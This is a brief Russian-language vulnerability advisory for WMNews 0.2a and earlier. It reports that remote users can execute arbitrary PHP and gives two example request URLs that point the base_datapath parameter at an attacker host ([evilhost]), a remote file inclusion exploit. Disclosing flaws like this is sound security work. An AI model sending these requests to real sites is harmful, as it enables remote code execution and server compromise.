Программа: WMNews <= 0.2a

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.

Пример:

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]



Оставить мнение